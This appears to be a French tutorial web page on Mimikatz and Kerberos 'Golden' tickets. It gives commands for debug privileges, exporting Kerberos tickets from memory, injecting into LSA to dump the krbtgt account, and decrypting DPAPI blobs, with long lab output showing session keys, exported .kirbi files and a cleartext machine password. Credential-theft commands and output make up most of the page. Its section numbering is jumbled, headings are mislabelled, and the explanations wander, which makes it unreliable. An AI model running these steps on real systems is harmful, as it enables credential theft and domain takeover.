Ticket d'Accès Kerberos Golden

Concepts fondamentaux :

Mimikatz un outil capital en cybersécurité, dévoile avec précision les faiblesses des systèmes informatiques par ses analyses minutieuses. Adaptable aux exigences spécifiques de la sécurité, il est précieux pour renforcer les défenses informatiques.

Grâce à sa capacité à intégrer divers protocoles de sécurité, son efficacité pour accélérer les audits et sa rapidité de réaction face aux incidents, Mimikatz est indispensable pour les spécialistes de la sécurité. Il excelle notamment dans la manipulation des Tickets d'Accès Kerberos Golden, rendant cet outil essentiel pour la gestion sécurisée des accès utilisateur, et éclaire sur les meilleures pratiques de sécurisation des environnements Windows.

Mimikatz

5.0 - Tickets d'Accès Kerberos Golden

Nous nous concentrons sur les Tickets d'Accès Kerberos Golden, essentiels pour la gestion des accès dans les environnements Windows et un élément clé de Mimikatz, soulignant son rôle crucial dans la sécurisation des identifiants et des données sensibles.

Hannah Swann mimikatz/mimikatz ParrotSec

Explication : La manipulation des Tickets d'Accès Kerberos Golden, une fonctionnalité clé de Mimikatz, permet de gérer les autorisations et les accès au sein des systèmes Windows sans accéder directement aux données elles-mêmes. Cette fonctionnalité met en lumière la nécessité de sécuriser ces tickets pour prévenir les accès non autorisés et les fuites d'informations. Les mesures de défense incluent l'application de protocoles de sécurité stricts et la surveillance constante des activités suspectes pour contrer les tentatives d'intrusion.

Exclusivement sur : spear-phishing.com Plus de détails

Mimikatz

5.1 - Extraction des données krbtgt

L'extraction des données krbtgt permet d'extraire les données sensibles du compte krbtgt, essentiel pour l'authentification Kerberos, en injectant du code dans le processus de l'Autorité de Sécurité Locale (LSA). 


        

          
          

            
            privilege::debug
            
          

        

      

    




  

    
Mimikatz

    

      5.1.1 - Commande : 
 Activer les Privilèges de Debug
        

        


L'activation des privilèges de debug avec la commande privilege::debug dans Mimikatz est une étape cruciale qui permet à l'outil d'accéder à un niveau de privilèges élevés sur le système. Cette commande habilite Mimikatz à manipuler et à extraire des informations sensibles qui ne seraient autrement pas accessibles, comme les mots de passe en clair et les tokens de sécurité. En utilisant cette commande, les utilisateurs garantissent que Mimikatz dispose des permissions nécessaires pour effectuer ses opérations de manière optimale, soulignant l'importance de disposer des droits adéquats pour une analyse de sécurité approfondie.

      

    


    

      

        
      

      

        

        

          
          

            
            sekurlsa::tickets /export
            
          

        

      

    


    

      

        
Mimikatz

        

          5.1.2 - Commande : 
 Activer les Privilèges de Debug 


        

        


L'utilisation de la commande sekurlsa::tickets /export dans Mimikatz est cruciale pour les professionnels en cybersécurité, permettant l'extraction des tickets Kerberos directement de la mémoire du système. Ces tickets sont fondamentaux pour authentifier les accès aux ressources réseau sur Windows. Cette commande révèle comment Windows gère l'authentification des utilisateurs et permet d'identifier des vulnérabilités potentielles, accentuant la nécessité de renforcer les mesures de sécurité pour prévenir les accès non autorisés.

      

    






  

  

  
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 377373 (00000000:0005c21d)  
Session           : Interactive from 1  
User Name         : Patrick
Domain            : PSMAPEXEC
Logon Server      : PSMAPEXECDC
Logon Time        : 13/04/2024 23:17:14
SID               : S-1-5-21-2219323954-161165992-3642715579-1107

         * Username : Patrick
         * Domain   : PSMAPEXEC.LAN
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:35 ; 14/04/2024 09:17
:13 ; 20/04/2024 23:17:13
           Service Name (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : Patrick ; @ PSMAPEXEC.LAN ( PSMAPEXEC.LAN )
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc

             8f88d6e5191fc5af0ac8fc379ef256417e6c19e747049e83f1158a0a4e864845
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;5c21d]-0-0-40a50000
-Patrick@LDAP-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:13 ; 14/04/2024 09:17
:13 ; 20/04/2024 23:17:13
           Service Name (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Target Name  (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Client Name  (01) : Patrick ; @ PSMAPEXEC.LAN ( PSMAPEXEC.LAN )
           Flags 40e10000    : name_canonicalize ; pre_authent
 ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             9541b411fc0340221d57f047a118adcd5dcec810003fa02b9880872c1fd8050c
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;5c21d]-2-0-40e10000-Patrick@krbtgt-PSMAPEXEC.LAN.kirbi !

Authentication Id : 0 ; 377328 (00000000:0005c1f0)
Session           : Interactive from 1 
User Name         : Patrick
Domain            : PSMAPEXEC
Logon Server      : PSMAPEXECDC
Logon Time        : 13/04/2024 23:17:14
SID               : S-1-5-21-2219323954-161165992-3642715579-1107

         * Username : Patrick
         * Domain   : PSMAPEXEC.LAN
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:13 ; 14/04/2024 09:17
:13 ; 20/04/2024 23:17:13
           Service Name (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : Patrick ; @ PSMAPEXEC.LAN ( PSMAPEXEC.LAN )
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             5706d0da4d83140bd8e6e574ef4de89f336d1bbca539910227932a741129cfb4
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;5c1f0]-0-0-40a50000
-Patrick@LDAP-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:13 ; 14/04/2024 09:17
:13 ; 20/04/2024 23:17:13
           Service Name (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Target Name  (02) : krbtgt ; PSMAPEXEC ; @ PSMAPEXEC.LAN
           Client Name  (01) : Patrick ; @ PSMAPEXEC.LAN ( PSMAPEXEC )
           Flags 40e10000    : name_canonicalize ; pre_authent
 ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             a54d7b5a876b2123057cc0f1aed8de376b494802d8bd0f83c0b75ca7c48ecbb4
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;5c1f0]-2-0-40e10000
-Patrick@krbtgt-PSMAPEXEC.LAN.kirbi !

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : SERVICE LOCAL
Domain            : AUTORITE NT
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:06
SID               : S-1-5-19

         * Username : (null)
         * Domain   : (null)
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 75800 (00000000:00012818)
Session           : Interactive from 1 
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:06
SID               : S-1-5-90-0-1

         * Username : DESKTOP-A5UG7GH$
         * Domain   : PSMAPEXEC.lan
         * Password : 8 F'S)hUmD4k1gA\^wdg^YzN]Ig>TS?mv)_IvK5R"OO';EzOH=Aa:+g6+'TU
Lu&CcD:A.pButw9Jkk\Z\4'_`n'b7MO.E4( Zm6p%YwWdAQ%SQ:"=t1vJbf

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 75756 (00000000:000127ec)
Session           : Interactive from 1 
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:06
SID               : S-1-5-90-0-1

         * Username : DESKTOP-A5UG7GH$
         * Domain   : PSMAPEXEC.lan
         * Password : 8 F'S)hUmD4k1gA\^wdg^YzN]Ig>TS?mv)_IvK5R"OO';EzOH=Aa:+g6+'TUL
u&CcD:A.pButw9Jkk\Z\4'_`n'b7MO.E4( Zm6p%YwWdAQ%SQ:"=t1vJbf

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DESKTOP-A5UG7GH$
Domain            : PSMAPEXEC
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:06
SID               : S-1-5-20

         * Username : desktop-a5ug7gh$
         * Domain   : PSMAPEXEC.LAN
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:11 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : ldap ; PSMAPEXECDC.PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : ldap ; PSMAPEXECDC.PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             bf098e4803081b6e24e42794ed3cf4a696b4bbc8a75408cd4746eb324e781235
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3e4]-0-0-40a50000
-DESKTOP-A5UG7GH$@ldap-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !
         [00000001]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14
/04/2024 09:17:07 ; 20/04/2024 23:17:07
           Service Name (02) : cifs ; PSMAPEXECDC.PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : cifs ; PSMAPEXECDC.PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             498a1e038b83d33147baaac04cf488c1463b10ccad8d2cf208902be4f9f6de43
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3e4]-0-1-40a50000
-DESKTOP-A5UG7GH$@cifs-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !
         [00000002]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : ldap ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : ldap ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN ( PSMAPEXEC.LAN )
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             1e2f7fa8285e101eb8d90714c5be30f66903a47464af5d1910a99d688be31a58
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3e4]-0-2-40a50000
-DESKTOP-A5UG7GH$@ldap-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Target Name  (--) : @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
 ( $$Delegation Ticket$$ )
           Flags 60a10000    : name_canonicalize ;
 pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             168eca65e16e4385da113046813c5be79f4be034d28c0892f6481d92f7fb0ed0
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3e4]-2-0-60a10000
-DESKTOP-A5UG7GH$@krbtgt-PSMAPEXEC.LAN.kirbi !
         [00000001]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Target Name  (02) : krbtgt ; PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN ( PSMAPEXEC.lan )
           Flags 40e10000    : name_canonicalize ;
 pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             a2f24a24ebc5dfbb7253fb77750a8b7efca1c17196e308bd9bb37337668f3bcf
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3e4]-2-1-40e10000
-DESKTOP-A5UG7GH$@krbtgt-PSMAPEXEC.LAN.kirbi !

Authentication Id : 0 ; 52106 (00000000:0000cb8a)
Session           : Interactive from 1 
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:05
SID               : S-1-5-96-0-1

         * Username : DESKTOP-A5UG7GH$
         * Domain   : PSMAPEXEC.lan
         * Password : 8 F'S)hUmD4k1gA\^wdg^YzN]Ig>TS?mv)_IvK5R"OO';EzOH=Aa:+g6+'TU
Lu&CcD:A.pButw9Jkk\Z\4'_`n'b7MO.E4( Zm6p%YwWdAQ%SQ:"=t1vJbf

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 52044 (00000000:0000cb4c)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:05
SID               : S-1-5-96-0-0

         * Username : DESKTOP-A5UG7GH$
         * Domain   : PSMAPEXEC.lan
         * Password : 8 F'S)hUmD4k1gA\^wdg^YzN]Ig>TS?mv)_IvK5R"OO';EzOH=Aa:+g6+'TU
Lu&CcD:A.pButw9Jkk\Z\4'_`n'b7MO.E4( Zm6p%YwWdAQ%SQ:"=t1vJbf

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DESKTOP-A5UG7GH$
Domain            : PSMAPEXEC
Logon Server      : (null)
Logon Time        : 13/04/2024 23:17:05
SID               : S-1-5-18

         * Username : desktop-a5ug7gh$
         * Domain   : PSMAPEXEC.LAN
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:08 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : cifs ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : cifs ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN ( PSMAPEXEC.lan )
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             7beaa32bcc7d040245c8bfd0473936193785fc22df6ac95126da0955cd36ae9c
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3e7]-0-0-40a50000
-DESKTOP-A5UG7GH$@cifs-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !
         [00000001]
           Start/End/MaxRenew: 13/04/2024 23:17:08 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
           Target Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
           Flags 40a10000    : name_canonicalize ;
 pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             b32db3f8667e2ea165779eb5f2439e16006e89654504b9fa4cfadaba7dfecc0c
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 1        [...]
           * Saved to file [0;3e7]-0-1-40a10000.kirbi !
         [00000002]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             5ea0b33c193cd4cebba1e79caa391cc91a08cf1461a10dc0ba326b1b9d324338
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3e7]-0-2-40a50000
-DESKTOP-A5UG7GH$@LDAP-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !
         [00000003]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Target Name  (02) : LDAP ; PSMAPEXECDC.PSMAPEXEC.lan ;
 PSMAPEXEC.lan ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN ( PSMAPEXEC.LAN )
           Flags 40a50000    : name_canonicalize ;
 ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             60f09e5d5df283ed0a3585b2b6e109256907be92b23c991f464b69b62c3604ec
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;3e7]-0-3-40a50000
-DESKTOP-A5UG7GH$@LDAP-PSMAPEXECDC.PSMAPEXEC.lan.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 13/04/2024 23:17:08 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Target Name  (--) : @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN
 ( $$Delegation Ticket$$ )
           Flags 60a10000    : name_canonicalize ;
 pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             da9a282c98d8a69eb7a695ba90fac144cc7a1772ca0841d2e1f35b02e0013426
           Ticket            : 0x00000012 - aes256_hmac       ; kvno
 = 2        [...]
           * Saved to file [0;3e7]-2-0-60a10000
-DESKTOP-A5UG7GH$@krbtgt-PSMAPEXEC.LAN.kirbi !
         [00000001]
           Start/End/MaxRenew: 13/04/2024 23:17:07 ; 14/04/2024 09:17
:07 ; 20/04/2024 23:17:07
           Service Name (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Target Name  (02) : krbtgt ; PSMAPEXEC.LAN ; @ PSMAPEXEC.LAN
           Client Name  (01) : DESKTOP-A5UG7GH$ ; @ PSMAPEXEC.LAN ( PSMAPEXEC.LAN )
           Flags 40e10000    : name_canonicalize ;
 pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             63b7e77f2e10c98ce85e34fa20f9b468adfdb614ac67a70fd00706656cfd9766
           Ticket            : 0x00000012 - aes256_hmac       ; kvno
 = 2        [...]
           * Saved to file [0;3e7]-2-1-40e10000
-DESKTOP-A5UG7GH$@krbtgt-PSMAPEXEC.LAN.kirbi !

mimikatz #





  





    

      

        
Mimikatz

        

          5.1.3 - Analyse des résultats
         


        

L'utilisation de Mimikatz pour exporter les tickets Kerberos, comme le montre la commande sekurlsa::tickets /export, fournit un aperçu détaillé des sessions d'authentification de l'utilisateur Patrick dans le domaine PSMAPEXEC. Cette commande révèle des informations précieuses sur les tickets Kerberos, y compris le Ticket Granting Ticket (TGT) et les service tickets pour LDAP, indiquant les heures de début et de fin, les noms des services, et les drapeaux de sécurité comme "renewable" et "forwardable". Ces détails soulignent l'importance de Mimikatz non seulement pour identifier et exploiter les vulnérabilités mais également pour comprendre les mécanismes complexes de l'authentification Kerberos et leur impact sur la sécurité des réseaux d'entreprise. Les résultats illustrent également comment les clés de session cryptographiques sécurisent les transactions d'authentification, et l'enregistrement des tickets dans des fichiers ".kirbi" peut servir à des fins d'audit ou de tests de pénétration.


      

    

  







  

    

    
    Tableau des Tickets d'Authentification Kerberos
    


    
Tableau Détaillé des Tickets d'Authentification Kerberos


    

      

        Attribut
        Description
        Exemple
      

      

        ID d'authentification
        Identifiant unique de l'authentification Kerberos
        0 ; 377373 (00000000:0005c21d)
      

      

        Type de session
        Type de la session (interactive, service, etc.)
        Interactive from 1 
      

      

        Nom d'utilisateur
        Nom de l'utilisateur connecté
        Patrick
      

      

        Domaine
        Domaine de l'utilisateur
        PSMAPEXEC
      

      

        Serveur de connexion
        Serveur où la session a été ouverte
        PSMAPEXECDC
      

      

        Heure de connexion
        Heure à laquelle l'utilisateur s'est connecté
        13/04/2024 23:17:14
      

      

        SID
        Identifiant de sécurité de l'utilisateur
        S-1-5-21-2219323954-161165992-3642715579-1107
      

      

        Informations des tickets
        Détails des tickets Kerberos obtenus, incluant le type de service, le nom cible, le nom client, les drapeaux et les horaires de validité
        
          Service Name: LDAP, Target Name: PSMAPEXECDC.PSMAPEXEC.lan, Client Name: Patrick, Flags: renewable, forwardable, Start/End/MaxRenew: 13/04/2024 23:17:13 ; 14/04/2024 09:17:13 ; 20/04/2024 23:17:13, Ticket: aes256_hmac
        
      

      

        Clé de session
        Clé utilisée pour chiffrer le ticket Kerberos
        0x00000001 - des_cbc_crc 8f88d6e5191fc5af0ac8fc379ef256417e6c19e747049e83f1158a0a4e864845
      

      

        Fichier sauvegardé
        Emplacement du fichier où le ticket est sauvegardé
        [0;5c21d]-0-0-40a50000-Patrick@LDAP-PSMAPEXECDC.PSMAPEXEC.lan.kirbi
      

    

  









  

    

      

        
    

    

        
Mimikatz

        

          5.2 - Récupéreration des données clés du compte krbtgt
        

        

Localiser et créer un Blob DPAPI : Dans cette tâche, nous allons identifier et créer des données chiffrées, généralement stockées sous forme de fichiers .blob, qui sont souvent situées dans des répertoires associés à des applications ou des services spécifiques.
 
      

    

  











  

    

      

        
      

      

        

        

          
          

            
            lsadump::lsa /inject /name:krbtgt
          

        

      

    




  

    
Mimikatz

    

      3.2.1 - Commande : 
 Recherche de Fichiers .blob dans le Répertoire C:
    

    
La commande dir C:\*.blob /s /b est une commande utilisée dans l'invite de commande (cmd) de Windows pour rechercher tous les fichiers avec l'extension ".blob" dans le répertoire racine du lecteur C et dans tous ses sous-répertoires. Voici ce que chaque option signifie : 


/s  : Recherche dans les sous-répertoires. 
 
/b  : Formatage de la sortie pour afficher uniquement le nom complet des fichiers sans entêtes ni résumés.

  





  



  
# Importer le module System.Security.Cryptography
Add-Type -AssemblyName System.Security

# Données à chiffrer
$donneesAChiffrer = "Données confidentielles à chiffrer."

# Chiffrer les données avec DPAPI
# Assurez-vous de ne pas diviser cette ligne
$donneesChiffrees = [System.Security.Cryptography.ProtectedData]::Protect
([System.Text.Encoding]::UTF8.GetBytes($donneesAChiffrer), $null, 'CurrentUser')
# Enregistrer les données chiffrées dans un fichier .blob
$cheminFichierBlob = "C:\Chemin\Vers\Le\Fichier.blob"
[System.IO.File]::WriteAllBytes($cheminFichierBlob, $donneesChiffrees)

Write-Host "Fichier .blob créé avec succès : $cheminFichierBlob"




 







  

    
Mimikatz

    

      2.5.2 - Création d'un Fichier .blob pour Stocker des Données Chiffrées avec DPAPI
    

    

Dans cet exemple, nous explorons le processus de création d'un fichier .blob  pour stocker des données chiffrées à l'aide du DPAPI  (Data Protection API) sous Windows. Le DPAPI  est un mécanisme intégré de chiffrement des données qui utilise les clés de protection de données spécifiques à chaque utilisateur pour sécuriser les informations sensibles. En utilisant PowerShell, nous importons le module System.Security.Cryptography pour accéder aux fonctionnalités de chiffrement. Ensuite, nous spécifions les données à chiffrer, dans cet exemple, une chaîne de caractères représentant un message. Après avoir chiffré les données avec le DPAPI , nous les enregistrons dans un fichier .blob sur le système de fichiers local. Ce fichier .blob peut être utilisé ultérieurement pour stocker et récupérer les données chiffrées de manière sécurisée.

  



  







    

        

            

                
Mimikatz

                

                    3.3 - Déchiffrage de données :
                

                  
Le déchiffrage de données protégées par DPAPI est une étape cruciale dans la récupération d'informations sécurisées. En utilisant la clé master appropriée et en localisant les données chiffrées sur le système, il devient possible de restaurer l'accès aux informations confidentielles. Ce processus permet de déverrouiller des données sensibles tout en garantissant leur sécurité et leur intégrité.
 
            

            

                
            

        

    








  




      

        
      

      

        

        

          
          

            
            dpapi::blob /in:"chemin_vers_les_données_chiffrées" /masterkey:clé_masterkey

            
          

        

      

    




  

    
Mimikatz

    

      3.3.1 - Commande : 
 Déchiffrage de données avec DPAPI
    

    
La commande dpapi::blob /in:"chemin_vers_les_données_chiffrées" /masterkey:clé_masterkey est utilisée pour déchiffrer des données protégées par DPAPI. En spécifiant le chemin vers les données chiffrées et en fournissant la clé master, cette commande permet d'accéder aux informations confidentielles en les déchiffrant. C'est un outil essentiel pour récupérer des données sécurisées tout en maintenant leur intégrité et leur confidentialité.

  




    



  

  
 

  
mimikatz # dpapi::blob /in:"C:\Chemin\Vers\Le\Fichier.blob" /masterkey:ef297506dbd8
aca5aa6c9477e2fbefad243ec327e45f8a0235b6f541136584008884eccf7913756fa5832b1371ac65
c2348d4a89786b069c6fe96422ef9e514a
**BLOB**
  DWVersion          : 00000001 - 1
  GUIDProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  DWMasterKeyVersion : 00000001 - 1
  GUIDMasterKey      : {c6f319bf-f728-4299-97b3-6031713da0cf}
  DWFlags            : 00000000 - 0 ()
  DWDescriptionLen   : 00000002 - 2
  SZDescription      :
  ALGCrypt           : 00006610 - 26128 (CALG_AES_256)
  DWAlgCryptLen      : 00000100 - 256
  DWSaltLen          : 00000020 - 32
  PBSalt              : 7357debe729ea8b24964a7d19a0ef155546bb8d40513618fc
7045527e821043a
  DWHmacKeyLen       : 00000000 - 0
  PBHmacKey         :
  AlgHash            : 0000800e - 32782 (CALG_SHA_512)
  DWAlgHashLen       : 00000200 - 512
  DWHmac2KeyLen      : 00000020 - 32
  PBHmacKey        : 0d98b81273ba5e95471dc4e54394cfc1c93e8058502c52e62ea
27901ee885e5b
  DWDataLen          : 00000030 - 48
  PBData             : 0ad8408d6a0a9df667af6cb96fb0baa14882c51cd52014e8dff57
68cb7b555670ef25d6ac0680becd94d9f24a2cb7aed
  DWSignLen          : 00000040 - 64
  PBSign             : a3e1829933c145c8ff4b225da965c624e6030844a8654b9f1f051
202ec602fe015f6046c0b934c6dfee83d1a6fca363400643fa6fd37f11939b8e406e4e4caed

 * Volatile Cache: GUID:{c6f319bf-f728-4299-97b3-6031713da0cf};KeyHash:3fd67
9f3551c7d8ad3018d936c42f1a6edaf9025;Key:available
 * Masterkey     : ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f5411
36584008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe96422ef9e514a
description :
data: 44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 66 69 64 65 6e 74 69 65 6c 6c 65 
73 20 c3 a0 20 63 68 6 66 72 65 72 2e

mimikatz #



  





    

      

        
Mimikatz

        

          3.3.2 - Analyse des résultats
         


        

La commande dpapi::blob de Mimikatz démontre comment déchiffrer des informations protégées par DPAPI à l'aide d'une clé maîtresse spécifique. Cette opération révèle les aspects techniques tels que l'utilisation d'AES-256 pour le chiffrement et SHA-512 pour l'intégrité des données, tout en affichant les données déchiffrées. Dans cet exemple, les informations sensibles précédemment chiffrées sont exposées en format hexadécimal, fournissant un accès direct et lisible aux données originales.


      

    

  






  

    


    
    Tableau des informations d'authentification






    
Informations sur le BLOB DPAPI


    

      

        BLOB
        DWVersion
        GUIDProvider
      

      

        Cela indique que les informations suivantes concernent un fichier blob.
        Il s'agit de la version du fichier blob.
        C'est l'identifiant unique du fournisseur de services DPAPI qui a créé ce blob.
      

      

        DWMasterKeyVersion
        GUIDMasterKey
        DWFlags
      

      

